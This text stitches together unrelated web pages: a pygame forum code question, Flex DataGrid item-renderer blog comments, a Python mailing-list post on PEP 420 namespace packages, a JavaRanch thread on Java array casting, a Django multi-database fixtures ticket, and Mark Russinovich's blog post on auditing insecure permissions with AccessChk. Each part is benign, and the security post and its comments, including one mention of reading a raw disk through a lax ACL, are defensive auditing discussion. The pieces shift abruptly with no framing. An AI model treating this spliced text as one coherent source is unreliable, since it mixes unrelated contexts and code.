sourceratio = 1 #testing with square pics for now
picxsize = targetw/numpicsx
numpicsy = targeth/(picxsize*sourceratio)
picysize = targeth/numpicsy

print 'Blitting target image'
screen = pygame.display.set_mode(targetsize)
screen.fill((255,255,255)) #set to white in case of transparency
screen.blit(targetpic,(0,0))

#update screen
pygame.display.update()
pygame.display.flip()
clock.tick(30) #probably not needed in this script

SLOWDOWN = .1 #temp slow down to watch it

print numpicsx #here are some print statements just to show all the starting values are correct
print numpicsy
print '---'
print picxsize
print picysize
sleep(1)

for x in xrange(numpicsx):
    for y in xrange(numpicsy):
        currentrect = [x*picxsize,y*picysize,x*picxsize+picxsize,y*picysize+picysize]
        avgc = pygame.transform.average_color((targetpic), currentrect) #average color
        avgc = avgc[:3] #drops out the alpha if there is one
        #pygame.draw.rect(screen, avgc, currentrect)
        pygame.draw.rect(screen, avgc, (currentrect[0],currentrect[1],currentrect[0]+2,currentrect[1]+2)) #hard coded 2s (rather than 12s in this case) to help pin point the problem
        pygame.display.update()
        pygame.display.flip()
        clock.tick(30) #probably not needed
        sleep(SLOWDOWN)

print 'Done./nSleeping then quitting...'
sleep(3)
pygame.quit()
```
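One detail worth knowing when reading the loop above: pygame rect arguments are (left, top, width, height), not (left, top, right, bottom). A small, self-contained sketch (values hypothetical, matching the 12-pixel blocks mentioned in the post) of the difference between the two conventions:

```python
picxsize, picysize = 12, 12  # block size from the post


def fixed_size_rect(x, y):
    # Width and height stay constant no matter which block we are on.
    return (x * picxsize, y * picysize, picxsize, picysize)


def right_bottom_rect(x, y):
    # Same arithmetic as `currentrect` above: the 3rd and 4th values are
    # really right/bottom coordinates, so if they are passed where a
    # (width, height) pair is expected, the rectangles grow with x and y.
    return (x * picxsize, y * picysize,
            x * picxsize + picxsize, y * picysize + picysize)


print(fixed_size_rect(3, 5))   # (36, 60, 12, 12)
print(right_bottom_rect(3, 5))  # (36, 60, 48, 72) -- 4x wider, 6x taller
```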
http://www.dreamincode.net/forums/topic/306706-pygame-problem-with-blit-and-strange-variable-issues/
Full code after the jump. And the custom item renderer, PriceLabel.as, is as follows: View source is enabled in the following example.

48 thoughts on "Formatting a Flex DataGrid control using a custom item renderer"

Hi, Thanks a lot, man!

Hi Peter, Thanks for the example! :) Do you know how to create an item renderer in a datagrid column that creates different components based on the data? For example:

column 1 ...... column 2
item 1 ........ [checkbox]
item 2 ........ [checkbox]
item 3 ........ [combobox]
item 4 ........ [textinput]
item 5 ........ [textinput]

data: array = [{label:'item 1',type:'checkbox'},etc]

When I scroll or sort the headers everything screws up. How do I center-align a checkbox inside a datagrid? It always aligns left... Please help.

Richie, I'm not sure, but check out Alex Harui's excellent blog entry, "More Thinking About Item Renderers", which has a demo and full source code. Peter

Could you tell me the build number of the Flex compiler? I got different behavior from your example. The price column and cell have the same align - "right". My build number: Version 2.0.1 build 155542. Thanks.

sinnus, All of the examples in this blog were built with various beta/nightly builds of the Flex 3 SDK. Peter

@Ritchie, I've centered a checkbox in a datagrid column before by adding an HBox around it and using horizontalAlign="center"

Hey Now, Nice post, it was helpful to me. Thx 4 the info, Catto

An improvement to the label function might be to change

return currencyFormatter.format(item.@price);

to

return currencyFormatter.format(item[column.dataField]);

This should make the label function usable on any column that can be formatted as currency, rather than hardcoding in the column field.

Hi Peter, what can I do to change the background of an entire line, based on some information in the fields? Thanks.
@judah (6 months later), I think you need to override the set data accessor - the same instances of the renderer get reused, so you'll need to change the contents of the view hierarchy when the data changes.

Flex newbie... Is there a way to make this package more generic so the column name doesn't have to be embedded in the package? This way any column that needed this formatting "itemRenderer" could use this package. Thanks for all of your examples!!

Greg C, Try something like this: Peter

Hi, I was wondering where the listData object comes from? Thanks in advance for your help

Thanks Peter. Worked great!

Peter, I am trying to apply your above example to similar code for another use of a datagrid itemRenderer. So I was wondering if you could point me in the right direction if I wanted the value of an external control to affect the threshold point of the values that are colored. So if I had an HSlider, it could be used to dynamically change the value of the cut-off point of the colored items in that column of the datagrid. So basically instead of: it would be: X being the value that would be represented by the position of the hslider. Does this make sense? Since I am new to this whole package/class thing, I am not sure how to access that external value inside of the package that is being called by the itemRenderer of a grid column. Thanks again!

Peter, Once again sorry for the double post... Any thoughts regarding how I can go about passing a dynamic value from a control into this package? I have tried a couple of things and none of them seem to work. Thanks, Greg C

Greg C, Probably not the best solution, but you could try using Application.application.slider.value. I'm not sure how well it would work since the itemRenderers wouldn't necessarily be updated when the slider changes. Peter

Some more great info, thanks for the tips.
Note that a similar solution (for background color) is posted by jlafferty at:

Hi guys, In this example, how can the price column be sorted as a number? Any ideas? Janet

janet, The price column is sorting as numbers, isn't it? Peter

Nope, when the prices are loaded you get ($1.32, $12.23, $4.96, $0.94); if you sort the price column you get ($12.23, $0.94, $1.32, $4.96) instead of ($12.23, $4.96, $1.32, $0.94), and if you sort again to get the numbers from descending to ascending you have ($4.96, $1.32, $0.95, $12.23) instead of ($0.95, $1.32, $4.96, $12.23)... janet

janet, Interesting. I see the same default sort as you (1.32, -12.23, 4.96, -0.94) - the items are unsorted and appear in the same order they were specified in the data provider. If I sort by price (descending), I get the following: -12.23, -0.94, 1.32, 4.96 (or Item 2, Item 4, Item 1, Item 3). This sort is correct since the biggest negative values are first and the biggest positive values are last. If I sort by price (ascending), I get the following: 4.96, 1.32, -0.94, -12.23 (or Item 3, Item 1, Item 4, Item 2). This sort is correct since the biggest positive values are first and the biggest negative values are last. Actually, are you sure your numbers are right? 0.94 and 12.23 are both negative numbers. So I wouldn't expect the price column to sort as 12.23, 4.96, 1.32, 0.94, since both 0.94 and 12.23 are negative numbers in the data provider. I'd expect 4.96, 1.32, -0.94, -12.23. Peter

Hi, I have developed a similar example. The difference is that my item renderer is a class extending LinkButton. The override function is the next: my problem is when I sort a column. When I click the column header, the data rows are changed but not sorted... but when I move the mouse cursor over the rows... magically... the data in the columns appears sorted. Any idea? Thanks, congratulations, it's a great website

Hello, Thanks for this very interesting example.
If I change the source to an ArrayCollection, what kind of modifications must I make in the PriceLabel.as file? Thanks, Best Regards

Pierre, In PriceLabel.as, it looks like I hard-coded the column data field (data.@price) into the item renderer. Of course, you could create a new subclass for each different data field (CostLabel.as, etc.), but that would probably not be the best approach. I think the better approach would be to look at my coworker Alex Harui's solution to this, as he is ridiculously smarter than I am: "Thinking About Item Renderers". Specifically, I was reading the Text Color and Styles in Item Renderers section. He shows how you can extend both the DataGridColumn and DataGridItemRenderer classes, and create a custom stylesFunction() method which evaluates the data in a column without hard-coding specific column names. Peter

Can an ItemEditor dispatch its own events? If so, how do you set an event listener to capture the event?

I'm trying to use similar code but have the logic based on the value of an attribute "D" in my XML data, and I cannot figure out for the life of me how to access the attribute in the .as file for the current column (I'm using the renderer for multiple columns). My XML looks something like this: using data..@D gives all D values for the current cols node (i.e. "12"). Can anyone advise? Thanks! Sussed it!

I have tried your example. Very useful. Thanks lots. I still have one question and hope you can help. Now I have 2 strings, let's say AAA and BBB, whose color I want to change out of many data items. I tried to use: but it only changes the color of BBB. So what should I do to change both fields? Thanks

Hi, Very nice blog... Is there any way to change the text color of an entire row of a datagrid based on data, without creating an itemRenderer for each column? I have around 10 columns, and want to change the color of the text to red or green based on some data. Thanks, Shreyas

Is there any concern about this method being a performance hit? I put a trace statement in my updateDisplayList() in my custom component while I was getting things going. I noticed that if I had 10 items, on load I got 20-30 traces. If I move my mouse over, I get more traces. Same with a select. I understand why this happens, but is there not a way to set it and forget it? Does the DG lose the settings each time it redraws? I am still sort of amazed that there isn't just a property to set for a row color.

Hi peterd, Instead of comparing the data value with 0, if I want to compare two column values and set the row red if column1's value is less than column2's value, how can I do that?

@Niladri, Try something like this: And the custom item renderer, PriceLabel.as, is as follows: Peter

Thanks a lot Peter.

Peter, I have one doubt. I'm allocating the data field for the data grid column dynamically. So sometimes it will not have the data field as col1; it may have the column field as col3 or col4. So my question is: instead of referring to the data field in PriceLabel.as, can I use the column id of those two columns in PriceLabel.as?

I would like to know if I could pass some objects to the constructor of the customItemRender class, because I wasn't able to do it; the compiler throws an error. I attach my code below:

customItemRender class:

```actionscript
package core {
    import mx.containers.VBox;
    import mx.controls.TextInput;

    public class customItemRender extends VBox {
        public function customItemRender(_TextInput:TextInput, _TextInput2:TextInput) {
            //TODO: implement function
            super.addChild(_TextInput);
            super.addChild(_TextInput2);
        }
    }
}
```

ActionScript code for creating an AdvancedDataGrid itemRenderer:

```actionscript
AdvancedDataGridColumn.itemRenderer = new ClassFactory(customItemRender(_TextInput1, _TextInput2));
```

Thanks in advance for your help, Regards, Javier

Thanks for the awesome example, I think the fact that you're still getting comments on a two year old post speaks to the usefulness of it.
I have multiple columns that I need to run through a label function; can you think of a quick way to make the label function re-usable? TIA, ~S

Never mind, I got it: See any problems with that? Thanks again, ~S

Great example, yet again you saved the day for me.

Thanks for your example and the nice comments there. I am facing a problem while trying to change the background of specific cells that pass certain conditions. For example, if I have a Start Letter, I test whether it was delivered to the group leader by comparing the date of the Start Letter with the system date. If it has already been sent to the group leader, I check whether the group leader has approved it. If not, I check the difference between the system date and the sent-to-group-leader date. If the result is greater than 15 and less than or equal to 30, that cell should be colored red. The other cells that are not used, like manager, should be gray. I would appreciate any help with this problem. My code is the following:

    package com.aramco.easd.ats.vo
    {
        import flash.display.Graphics;
        import mx.controls.DataGrid;
        import mx.controls.Label;
        import mx.controls.dataGridClasses.*;
        import mx.utils.StringUtil;

        [Style(name="backgroundColor", type="uint", format="Color", inherit="no")]

        public class BackgroundColor extends Label
        {
            // One day in milliseconds; fromDates() depends on this constant,
            // which was missing from the original post.
            private static const MILLISECONDS_IN_DAY:Number = 1000 * 60 * 60 * 24;

            public var g:Graphics;

            public function BackgroundColor()
            {
                super();
            }

            override protected function updateDisplayList(unscaledWidth:Number, unscaledHeight:Number):void
            {
                super.updateDisplayList(unscaledWidth, unscaledHeight);
                g = graphics;
                g.clear();
                var grid1:DataGrid = DataGrid(DataGridListData(listData).owner);
                unscaledWidth = this.unscaledWidth;
                unscaledHeight = this.unscaledHeight;
                if (grid1.isItemSelected(data) || grid1.isItemHighlighted(data))
                    return;
                checkStageLevel();
            } // end of override function

            public function checkStageLevel():void
            {
                var systdate:Date = new Date();

                // has the letter been sent to the group leader?
                if ((data.tmldSentDt == null || StringUtil.trim(data.tmldSentDt) == "") &&
                    (data.taskStaDt != null || StringUtil.trim(data.taskStaDt) != ""))
                {
                    checkDurationForStage(systdate, convertMyDate(data.taskStaDt));
                }

                // has the group leader approved the letter, or is it still waiting?
                if ((data.tmldApvDt == null || StringUtil.trim(data.tmldApvDt) == "") &&
                    (data.tmldSentDt != null || StringUtil.trim(data.tmldSentDt) != ""))
                {
                    checkDurationForStage(systdate, convertMyDate(data.tmldSentDt));
                }

                // has the division head approved the letter, or is it still waiting?
                if (data.ltrdesc == "Staking" || data.ltrdesc == "Survey")
                {
                    if ((data.mgraSentDt == null || StringUtil.trim(data.mgraSentDt) == "") &&
                        (data[DataGridListData(listData).dataField] == "mgraSentDt" ||
                         StringUtil.trim(data[DataGridListData(listData).dataField]) == "mgraSentDt"))
                    {
                        g.beginFill(0xA9A9A9);
                        g.drawRect(0, 0, unscaledWidth, unscaledHeight);
                        g.endFill();
                    }
                    if ((data.mgraApvDt == null || StringUtil.trim(data.mgraApvDt) == "") &&
                        (data[DataGridListData(listData).dataField] == "mgraApvDt" ||
                         StringUtil.trim(data[DataGridListData(listData).dataField]) == "mgraApvDt"))
                    {
                        g.beginFill(0xA9A9A9);
                        g.drawRect(0, 0, unscaledWidth, unscaledHeight);
                        g.endFill();
                    }
                }
            } // end of checkStageLevel

            public function convertMyDate(strToCheck:String):Date
            {
                // expects dates formatted as "MM/DD/YYYY"
                var uryear:String = strToCheck;
                if (uryear != null)
                    uryear = uryear.substr(uryear.length - 4, 4);
                var urmonth:String = strToCheck;
                if (urmonth != null)
                    urmonth = urmonth.substr(0, urmonth.indexOf("/"));
                var urday:String = strToCheck;
                urday = urday.substr(0, urday.length - 5);
                if (urday != null)
                    urday = urday.substr(3, urday.indexOf("/") + 1);
                var newDate:Date = new Date(Number(uryear), Number(urmonth) - 1, Number(urday));
                return newDate;
            }

            public function checkDurationForStage(systdate:Date, VariableDate:Date):void
            {
                var ResultSysdate_VariableDate:Number = fromDates(VariableDate, systdate);
                if (15 < ResultSysdate_VariableDate && ResultSysdate_VariableDate <= 30 &&
                    data[DataGridListData(listData).dataField] == data[DataGridListData(listData).dataField])
                {
                    g.beginFill(0xFF1234);
                    g.drawRect(0, 0, unscaledWidth, unscaledHeight);
                    g.endFill();
                }
                else if (30 < ResultSysdate_VariableDate && ResultSysdate_VariableDate <= 50 &&
                         data[DataGridListData(listData).dataField] == data[DataGridListData(listData).dataField])
                {
                    g.beginFill(0xFF1111);
                    g.drawRect(0, 0, unscaledWidth, unscaledHeight);
                    g.endFill();
                }
            }

            public static function fromDates(start:Date, end:Date):Number
            {
                return Math.ceil((end.time - start.time) / MILLISECONDS_IN_DAY);
            } // end of fromDates function
        }
    }

Thanks a lot. Helped a great deal. This is my dictionary for Flex. :) Regards, Sankara narayanan Ekambaranathan.

Hi, I have a problem with a data grid. Rows in my data grid display data with line breaks, so if a cell's content is composed of 3 lines, my row height expands in order to display all the content. The problem is that the row height, from what I see, depends on the first row's height; in my case, sometimes the first row has just one line and the third has 3 lines (but it's formatted like the first, with a one-line height). Hope you understand... Thanks.

Perfect solution.

Hi, I have an AdvancedDataGrid with a dataProvider. One of the columns contains a DropDownList (as an item renderer) with a different data provider. On change of the DropDownList I want to change the labels of one of the grid's columns. How can this be done? Can you please reply? Thanks

Thanks, man. Much appreciated.
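The day-bucketing rule in checkDurationForStage is easier to sanity-check in isolation. Below is a hypothetical Python port of just that rule (the colour constants come from the post above; the function name is made up), useful for verifying the boundary conditions of the two intervals:

```python
from datetime import date

def stage_colour(sent, today):
    """Bucket elapsed days the way checkDurationForStage does:
    (15, 30] days -> 0xFF1234, (30, 50] days -> 0xFF1111,
    anything else -> no fill (None)."""
    days = (today - sent).days
    if 15 < days <= 30:
        return 0xFF1234
    if 30 < days <= 50:
        return 0xFF1111
    return None
```

Exercising the boundaries this way (15 days gives no fill, 16 gives the first colour, 31 the second) confirms the intervals are half-open exactly as the ActionScript comparisons express them.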
http://blog.flexexamples.com/2007/08/20/formatting-a-flex-datagrid-control-using-a-custom-item-renderer/
Eric V. Smith wrote:
> Also, I'm not sure how common nested namespace packages are.

They seem common at least in the Plone community. Maybe a Plone user (I'm not a Plone user) could tell us more about it...

PJ Eby wrote:
> The proposal itself is intriguing, but it's not only less backward
> compatible and directory-cluttering, it has some potential for
> ambiguity in the spec and doesn't seem like a reasonable departure
> from other languages' conventions in this area.

I have poor knowledge of other languages. I just asked because I felt surprised that we are about to create (potentially nested) empty directories in order to implement namespaces, and then wondered if we could do it with only one directory. That said, my motivation isn't to block or change PEP 420. I was wondering why such a solution wasn't at least mentioned in the PEP as part of the discussions.

PJ Eby wrote:
> there is rarely a need for deep nesting

+1

I currently don't know a Python package with more than 3 levels (like zc.recipe.egg), and I guess that more than 3 levels would be too much.

Martin v. Löwis wrote:
> In Java, people apparently want that because they get these deeply
> nested directory hierarchies (org/apache/commons/betwixt/expression).
> It's apparently possible to condense this into
> org.apache.commons.betwixt/expression (which isn't a shorter string,
> but fewer cd commands / explorer clicks / .svn folders).

With a maximum of 3 levels, it's not such a big issue. A bit annoying, but low priority.

Martin v. Löwis wrote:
> On 13.05.2012 17:33, Guido van Rossum wrote:
>> -1. It would create a very busy toplevel directory. There's a reason
>> people nest directories...
>
> Alas, thanks to egg files, we already have busy toplevel directories,
> which extend into long sys.path lists.

seems a fair solution for this issue.

Regards, Benoit
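For readers unfamiliar with the feature under discussion: PEP 420 namespace packages, as eventually shipped in Python 3.3, let one top-level name span several sys.path entries without any __init__.py at the namespace level. A minimal, self-contained sketch (the package names are made up):

```python
import os
import sys
import tempfile

# Two independent "install locations", each contributing a portion
# of the same top-level namespace "acme".
root1 = tempfile.mkdtemp()
root2 = tempfile.mkdtemp()
os.makedirs(os.path.join(root1, "acme", "billing"))
os.makedirs(os.path.join(root2, "acme", "shipping"))

# The subpackages are ordinary packages; only "acme" itself has no
# __init__.py, which is what makes it a PEP 420 namespace package.
for root, part in ((root1, "billing"), (root2, "shipping")):
    with open(os.path.join(root, "acme", part, "__init__.py"), "w") as f:
        f.write("PART = {!r}\n".format(part))

sys.path[:0] = [root1, root2]

# Both portions are importable, and acme.__path__ spans both roots.
import acme.billing
import acme.shipping
```

Running this under Python 3.3+ shows why the thread's directory-layout debate matters: each nesting level is a real directory on disk, repeated once per contributing distribution.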
https://mail.python.org/pipermail/import-sig/2012-May/000637.html
casting between a ref type and an array.

vivek rai, Ranch Hand (Joined: May 08, 2000, Posts: 45), posted May 23, 2000 16:17:

Hi gurus, this might be slightly off the mark, and a bit of a theoretical question, but anyway, the JLS says (chap. 5, Conversions etc., sec. 5.5):

"The detailed rules for compile-time correctness checking of a casting conversion of a value of compile-time reference type S (source) to a compile-time reference type T (target) are as follows: If S is a class type: If T is an array type, then S must be the class Object, or a compile-time error occurs."

Now, my question is: any class can be cast to Object, so basically any class can be converted to some array of some other class without any compile-time error by casting it in two steps, i.e., casting to Object first and then to the array type. For example:

    class Point
    {
        int x, y;
    }

    class SomeClass {}

    public class Test
    {
        public static void main(String[] args)
        {
            Point p = new Point();
            SomeClass asc[] = new SomeClass[5];

            // this compiles
            asc = (SomeClass[]) ((Object) p);

            // this gives the compiler error:
            /* Invalid cast from Point to SomeClass[].
            asc = (SomeClass[]) (p);
            */
            asc = (SomeClass[]) (p);
        }
    }

So what is really meant by the statement given in the JLS? Is it incorrect, or does it have to be interpreted as applying to a single cast operation? Am I missing something here?
regards, vivek

Herbert Maosa, Ranch Hand (Joined: May 03, 2000, Posts: 289), posted May 23, 2000 18:27:

I have tried to go through your code. The statement under discussion, and indeed the rules governing safe compile-time and run-time casting, are quite diverse, and it is not feasible for me to discuss them all here. However, as regards casting arrays, note the following:

1. You can never safely cast a reference to an array into anything but a reference to an object of the Object class or another array.
Thus you can only do something like:

    a) Object someObject = (Object) someArray;
    b) SomeArrayType someArray = (SomeArrayType) anotherArray;

Note that in the case of a), you can safely just convert without an explicit cast. Case b) will only compile successfully if:

    a) both anotherArray and SomeArrayType contain object references, AND
    b) the object references in anotherArray are such that they can be safely cast into the references contained in SomeArrayType.

This may not be the best explanation, but if you follow it openly I believe it should shed more light on what that statement in the JLS means.
Regards, Herbert

Ajith Kallambella, Sheriff (Joined: Mar 17, 2000, Posts: 5782), posted May 23, 2000 18:55:

Here are my two cents worth. The type of an object is the class type that is used during its creation. The object continues to carry that identity all through its life. We only cast references; we don't cast objects. A reference is simply looking at an object from a different (but coherent) perspective. Once an object is created, its class type cannot be changed.
Ajith
Open Group Certified Distinguished IT Architect. Open Group Certified Master IT Architect. Sun Certified Architect (SCEA).

Herbert Maosa, Ranch Hand (Joined: May 03, 2000, Posts: 289), posted May 23, 2000 22:26:

Ajith, I just want to further this discussion with you and reach a consensus. I quote the following from your explanation:

-----------------------------------------------------------------
.
-----------------------------------------------------------------

I basically agree with this, save a few points. It is true that p is of type Point, and so it will remain for its entire lifetime. However, I think that the reason the statement asc = (SomeClass[])(p) fails to compile has nothing to do with the true class of p. I say this because the resolution of the true class of p is a run-time issue, not a compile-time one.
This will fail to compile because we are attempting to cast between an array and an object reference which is neither an array of a compatible type nor of the class Object, the only legal forms of safe array casting. Think about this.
Herbert

Anonymous, Ranch Hand (Joined: Nov 22, 2008, Posts: 18944), posted May 24, 2000 13:06:

FYI, a few basic rules to remember. Reference conversion and casting happen at both compile and run time. Conversion is up the inheritance tree; casting is down the inheritance tree. Apply common sense.

Object reference conversion (at compile time):
1. interface oldtype may convert to newtype if newtype is a superinterface of oldtype.
2. class oldtype may be converted to newtype if newtype is a superclass of oldtype.
3. array oldtype may be converted to newtype if both types are arrays containing object references and #2 above applies.

Object reference casting (at compile time):
4. interface oldtype can always be cast to newtype if newtype is a non-final class.
5. class oldtype may be cast to newtype if newtype is a subclass of oldtype.
6. array oldtype may be cast to newtype if both arrays contain object references and #5 above applies.
* The class type of an object can NOT be determined at compile time.

Object reference casting (at run time):
7. if newtype is a class, the class of the object being cast must be newtype or inherit from newtype.
8. if newtype is an interface, the class of the object being cast must implement newtype.

Hope this clears up any outstanding issues.

[This message has been edited by monty6 (edited May 24, 2000).]

I agree. Here's the link:
http://www.coderanch.com/t/191566/java-programmer-SCJP/certification/casting-ref-type-array
Opened 6 years ago
Closed 5 years ago

#14610 closed New feature (fixed)

fixtures should be able to specify their database

Description

I have a product that has two databases: one is the member-related database and the other is a 10 GB static database. For performance reasons, I have to keep them separate, and I have a database router which handles this. For testing purposes I need to load both databases for some of my function and view tests. The initial load of the test databases works correctly and I have two separate test databases, but when I specify fixtures in my TestCase, they all run against the default database, which causes the fixtures to fail to load. After spending the last 24 hours diving through the Django source code and talking to other developers, I cannot find a way to specify the database on which a fixture should load (when the 'syncdb' command is executed). This seems like a feature that should be built into fixtures (or the TestCase framework); otherwise developers can't test code that runs against multiple databases.
My database setup is:

    DATABASES = {
        'default': {
            'NAME': 'matt',
            'ENGINE': 'mysql',
            'USER': 'myuser',
            'PASSWORD': 'changeit',
            'HOST': ''
        },
        'voters': {
            'NAME': 'voters',
            'ENGINE': 'mysql',
            'USER': 'myuser',
            'PASSWORD': 'changeit',
            'HOST': ''
        }
    }

Here is my simple router:

    from django.conf import settings

    class VotizenRouter(object):
        """A router to control all database operations on models in the
        verifier application"""

        def db_for_read(self, model, **hints):
            "Point all read operations on verifier models to 'voters'"
            if model._meta.app_label == 'verifier':
                return 'voters'
            return None

        def db_for_write(self, model, **hints):
            "Point all write operations on verifier models to 'voters'"
            if model._meta.app_label == 'verifier':
                return 'voters'
            return None

        def allow_relation(self, obj1, obj2, **hints):
            "Allow any relation if a verifier model is involved"
            if obj1._meta.app_label == 'verifier' or obj2._meta.app_label == 'verifier':
                return True
            return None

        def allow_syncdb(self, db, model):
            "Make sure the verifier app only appears on the 'voters' db"
            if db == 'voters':
                return model._meta.app_label == 'verifier'
            elif model._meta.app_label == 'verifier':
                return False
            return None

The 'db' should be 'voters' when the 'app_label' of the model is 'verifier'. Since the fixture-loading logic has the database set to 'default', it fails to load the fixture. For testing purposes I rewrote the 'allow_syncdb' function to always return None, and as expected Django attempted to write the fixtures to the 'default' database instead of the one specified by the router.

Change History (5)

comment:1 Changed 6 years ago by

comment:2 Changed 6 years ago by

comment:3 Changed 5 years ago by

Any updates on this?

comment:4 Changed 5 years ago by

According to the docs, this feature already exists (in 1.3):

Database-specific fixtures
If you are in a multi-database setup, you may have fixture data that you want to load onto one database, but not onto another. In this situation, you can add a database identifier into the names of your fixtures.
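Because a router method receives only the model class and optional hints, the routing decision itself can be unit-tested with simple stand-in objects, independently of the fixture machinery. A sketch (the stand-in class names are hypothetical, and the router is trimmed to the read/write decision):

```python
class VerifierRouter:
    """Trimmed-down copy of the ticket's router: just the read/write
    decision, so it can be exercised without a Django project."""

    def db_for_read(self, model, **hints):
        if model._meta.app_label == 'verifier':
            return 'voters'
        return None

    def db_for_write(self, model, **hints):
        return self.db_for_read(model, **hints)

# Minimal stand-ins for Django model classes: all the router
# inspects is model._meta.app_label.
class _Meta:
    def __init__(self, app_label):
        self.app_label = app_label

class VoterRecord:
    _meta = _Meta('verifier')

class Customer:
    _meta = _Meta('members')
```

With stand-ins like these, one can confirm the router sends 'verifier' models to 'voters' and declines to route anything else, which isolates the bug to the fixture loader rather than the router.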
If your DATABASES setting has a 'master' database defined, you can define the fixture mydata.master.json or mydata.master.json.gz. This fixture will only be loaded if you have specified that you want to load data onto the master database.

So it would seem that the syntax is already prescribed for multi-db fixtures. However, from my experience this does not work correctly, or at least not always. I found this while looking for an existing bug report before submitting one. However, it is in here as a feature request and I do not feel qualified to change it to a bug.

comment:5 Changed 5 years ago by

Indeed, the problem originally described here is fixed. If you find a bug, please open a separate ticket, and provide enough information for someone else to reproduce the problem.

Sounds like a reasonable idea to me. Can you propose a syntax for fixtures to specify the DB?

P.S. You don't actually need to explicitly "return None"; a function which does not return anything returns None anyway.
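The naming convention quoted in comment:4 can be illustrated with a small, simplified parser. This is not Django's actual implementation, just a sketch of how a name like mydata.master.json.gz decomposes into fixture name, target database, serialization format, and compression suffix:

```python
def split_fixture_name(filename):
    """Simplified decomposition of a fixture filename into
    (name, database, format, compression). The real loader also
    validates the format against Django's registered serializers."""
    parts = filename.split('.')
    # optional trailing compression suffix
    compression = parts.pop() if parts[-1] in ('gz', 'zip', 'bz2') else None
    fmt = parts.pop()  # e.g. 'json', 'xml', 'yaml'
    # anything left beyond the base name is the database identifier
    database = parts.pop() if len(parts) > 1 else None
    return '.'.join(parts), database, fmt, compression
```

So a fixture named simply mydata.json loads everywhere it is requested, while mydata.master.json is restricted to the 'master' database, matching the behavior described in the quoted documentation.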
https://code.djangoproject.com/ticket/14610
Mark Russinovich's technical blog covering topics such as Windows troubleshooting, technologies and security.

    Processes:     accesschk everyone -pwu *
    Named Objects: accesschk everyone -owu \basenamedobjects
    Services:      accesschk everyone -cwu *

I ran similar commands looking for write access from the Authenticated Users and Users groups. An output line that looks like "RW C:\Program Files\Vendor" reveals a probable security flaw. To my surprise and dismay, I found security holes in several namespaces. The security settings on one application's global synchronization and memory-mapping objects, as well as on its installation directory, allow unprivileged users to effectively shut off the application, corrupt its configuration files, and replace its executables to elevate to Local System privileges. What application has such grossly insecure permissions? Ironically, that of a top-tier security vendor. For instance, AccessChk showed output that indicated the Users group has write access to the application's configuration directory (note that names have been changed):

    RW C:\Program Files\SecurityVendor\Config\
    RW C:\Program Files\SecurityVendor\Config\scanmaster.db
    RW C:\Program Files\SecurityVendor\Config\realtimemaster.db
    ...

Because malware would run in the Users group, it could modify the configuration data or create its own version and prevent the security software from changing it. It could also watch for dynamic updates to the files and reset their contents. For the object namespace, it reported output lines like this:

    RW [Section] \basenamedobjects\12345678-abcd-1234-cdef-123456789abc
    RW [Mutant]  \basenamedobjects\87654321-cdab-3124-efcd-6789abc12345
    ...

I executed handle searches in Process Explorer to determine which processes had these objects open, and it reported those of the security software.
Sections represent shared memory, so it was likely that the security agent, running in user login sessions, was using it to communicate data to the security software's service process that was running in the Local System account. Malware could therefore modify the contents of the memory, possibly triggering a bug in the service that might allow the malware to obtain administrative rights. At the minimum it could manipulate the data to foil the communication. "Mutant" is the internal name for Windows mutexes, and the security software's service was using the mutex for synchronization. That means that malware could acquire the mutex and block forward progress by the service. There were more than a few of these objects with wide-open security that could potentially be used to compromise or disable the security software. In the wake of my discovery, I analyzed the rest of my systems, as well as trial versions of other popular security, game, ISP and consumer applications. A number of the most popular in each category had problems similar to those of the security software installed on my development system. I felt like I was shining a flashlight under a house and finding rotten beams where I had assumed there was a sturdy foundation. The security research community has focused its efforts on uncovering local elevations via buffer overflows and unverified parameters, but has completely overlooked these obvious problems - problems often caused by the software of security ISVs, or in some cases, their own. Why are these holes created? I can only speculate, but because allowing unprivileged groups write access to global objects requires an explicit override of secure defaults, my guess is that they are common in software that was originally written for Windows 9x or that assumed a single administrative user.
When faced with permissions issues that crop up when migrating to a version of Windows with security, or that occur when their software is run by standard user accounts, the software developers have taken the easy way out and essentially turned off security. Regardless of the reason, it's time for software vendors - especially those of security applications - to secure their software. If you discover insecure software on your system, please file a bug with the publisher, and if you are a software developer, please follow the guidance in "Writing Secure Code" by Michael Howard and David LeBlanc.

Did you only find flawed security models in third-party applications, or were there numerous findings in the baseline OS? I work in infrastructure for a software developer, so I'll be passing this along for consideration. Thanks as always.

Thanks for the tool. I found a potential problem in a couple of minutes.

I get lots of output for Objects on 32-bit XP, but 0 for 64-bit XP, no matter what user or group I try. Objects not working on 64-bit?

D'Oh, how is this news? Some year-old examples: Security software from G-Data gives Everyone-FullAccess on its install directory and some registry keys. WebDrive, FTPDrive and Novell NetDrive set NULL DACLs on their service and driver. The NVidia ForceWare driver gives Everyone-FullAccess on some keys in HKLM\SYSTEM, which allows a user to DoS the system by writing garbage there. Additionally, the control panel uses a shared section for no good reason. DeviceLock, at least until version 5.76.1, gave Everyone-FullAccess on \Device\HarddiskX objects if the access list contained at least one allow entry (and otherwise totally removed any access, even to administrators). Hurray for "dd if=\\.\C:"! I could list many more examples...

@rivet: Of course in the baseline OS there are only minuscule violations, e.g. some Full and Create access in some HKCR\CLSID\{CLSID} keys, but nothing serious. Microsoft isn't dumb.
> I get lots of output for Objects on 32-bit XP, but 0 for 64-bit XP, no matter what user or group I try. Objects not working on 64-bit?

That's a bug that shows up only on 64-bit XP. I'll be posting an update in the next few days that addresses it.

I think that third-party software not only causes most Windows crashes, but also creates very many security flaws. For example, a driver creating a device object (for example, one meant as an interface with a service) that is accessible to everyone can be very dangerous.

WTF? 3 out of 8 comments are PingBack SPAM. Why doesn't Technet set up a filter that filters this SPAM? It's trivial to identify.

What Mark has pointed out is quite a general practice for many companies that need to migrate their software to a new OS. The developers do really go the easy way in most cases. However, that is not because we're lazy, but mostly because there are at least two reasons for it, in my experience:

1. The companies do not wish to involve much budget in support of a new OS version and push hard to make the software run with the same experience (as on the previous OS version) in a short time frame. The marketing and top management people are naturally interested in the implementation of new competitive features rather than in investing in grinding/tuning existing functionality, which might become broken by an upcoming OS but may be quickly "healed" in the way described by Mark.

2. The companies are forced (for some reason or another) to support previous versions of the OS, at least those that are still supported by Microsoft.

IMHO, Vista is great about many new things in many areas. As a sys-engineer/architect and developer (by spirit), I would certainly love to re-design the software in my abode to use Vista's features and style, dropping out the old-fashioned and aged things. Yet, to meet high-level goals, the interests of the company do not always coincide with my wishes.
